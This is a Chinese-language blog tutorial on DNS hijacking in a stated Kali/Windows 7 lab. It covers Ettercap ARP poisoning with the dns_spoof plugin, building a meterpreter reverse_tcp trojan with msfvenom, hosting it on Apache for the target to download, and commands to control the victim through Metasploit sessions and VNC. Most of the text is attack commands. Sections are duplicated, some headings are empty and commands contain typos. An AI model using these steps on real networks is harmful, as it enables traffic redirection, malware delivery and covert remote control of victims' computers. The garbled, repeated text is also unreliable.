当前位置: 首页 > news >正文

Day 3 DNS劫持

DNS

一、什么是DNS

在网络中,机器之间只认识IP地址,机器之间最终都要通过IP来互相访问。但是为了方便记忆,可以为IP地址设置一个对应的域名,通过访问域名,就可以找到对应IP地址的网站。

2. 环境搭建

2.1. 环境介绍

主机

系统

IP地址

攻击者

Kali-Linux

192.168.83.11

目标机

Windows 7

192.168.83.39

主要使用的技术是 kali 的 Ettercap 工具

 2.2. 环境准备

确保80端口没有被任何程序占用,如果有程序占用,则根据PID结束进程

  1. 开启端口转发

在root权限下才能修改成功,将 ip_forward 修改为 1

echo 1 > /proc/sys/net/ipv4/ip_forward

  1. 开启apache2

service apache2 restart

  1. 测试 apache 服务器是否开启

在 kali 的浏览器中输入 kali 的 ip

  1. 查看本机ip

ifconfig

fconfig

  1. 修改 etter.dns 将目标改为本机 ip

sudo vi /etc/ettercap/etter.dns

* 匹配所有域名转发到kali身上

ip 为 kali 自己的 ip

3. 开始攻击:

  1. 搜索ettercap进入

2.进行搜索

3.添加攻击目标

4.选择ARP

  1. 进入菜单找到Plugins,再展开Manage plugins后选择dan_spoof双击一下

  1. 通过CMD查看百度的IP地址是多少输入

ping www.baidu.com 发现百度ip与kali的ip一致则说明拦截完成

  1. 访问百度页面,跳转到指定界面说明劫持成功

4. kali入侵windows

4.1. 生成木马

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<本机IP> LPORT=<端口> -f exe x>木马文件.exe

4.2. 配置并启动监听

  1. 修改 etter.dns 将目标改为本机 ip

sudo vi /etc/ettercap/etter.dns

* 匹配所有域名转发到kali身上

ip 为 kali 自己的 ip

kali入侵windows

1.生成木马

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<本机IP> LPORT=<端口> -f exe x>木马文件.exe

 

2. 配置并启动监听

2.1 启动msf

msfconsole

 

 

2.配置模块

use exploit/multi/handler

 

 

3.选择攻击模块

set payload windows/meterpreter/reverse_tcp

 

4.配置 IP

set LHOST <IP

 5.配置端口

set LPORT <端口>

 6.查看配置参数

show options

 

 

7.后台运行

exploit -z -j
  1. 配置 IP

set LHOST <IP>

  1. 配置端口

set LPORT <端口>

  1. 查看配置参数

show options

  1. 后台运行

exploit -z -j

  1. 直接执行监听

run

4.3. 上传文件

  1. copy 文件至网站服务器

cp 文件 /var/www/html

  1. 开启服务

service apache2 start

  1. 靶机获取文件

<IP>/文件名

4.4. 等待靶机上钩

  1. 查看上钩的用户

sessions

  1. 选择攻击的用户

sessions -i 用户编号

5. 攻击命令

5.1. 监控靶机屏幕

run vnc -i

5.2. 实时观看远程用户桌面

5.3. 抓取交互式桌面屏幕截图

5.4. 录音

5.5. 播放波形音频文件

5.6. 打开记事本

execute -f notepad


http://www.mrgr.cn/news/62034.html

相关文章:

  • 微信小程序app.js里面onLaunch里面的函数比page里面的onshow里面的方法后执行
  • 【Eclipse系列】eclipse快捷键和设置
  • HDFS Balancer原理及优化方向
  • 如何在Linux系统中使用Zabbix进行监控
  • 深度学习-39-基于PyTorch的预训练源模型微调到目标模型的流程
  • 宠物空气净化器哪个好?希喂、352真实测评分享
  • Docker-基础
  • Transformer中的Encoder
  • ef core $ 附近有语法错误_ef core contains $符近语法错
  • 进程与文件系统(页框与内存的块的映射关系?)
  • 数对的最大曼哈顿距离[ABC178E] Dist Max
  • -函数结构
  • 多传感器数字化分析系统
  • Docker 部署 Java 项目实践
  • Android Studio项目(算法计算器)
  • openMV固件库编译环境搭建Linux
  • Java 并发工具(12/30)
  • QT——TCP网络调试助手
  • 创建ODBC数据源SQLConfigDataSource函数的用法
  • gpio子系统-通过io来控制gpio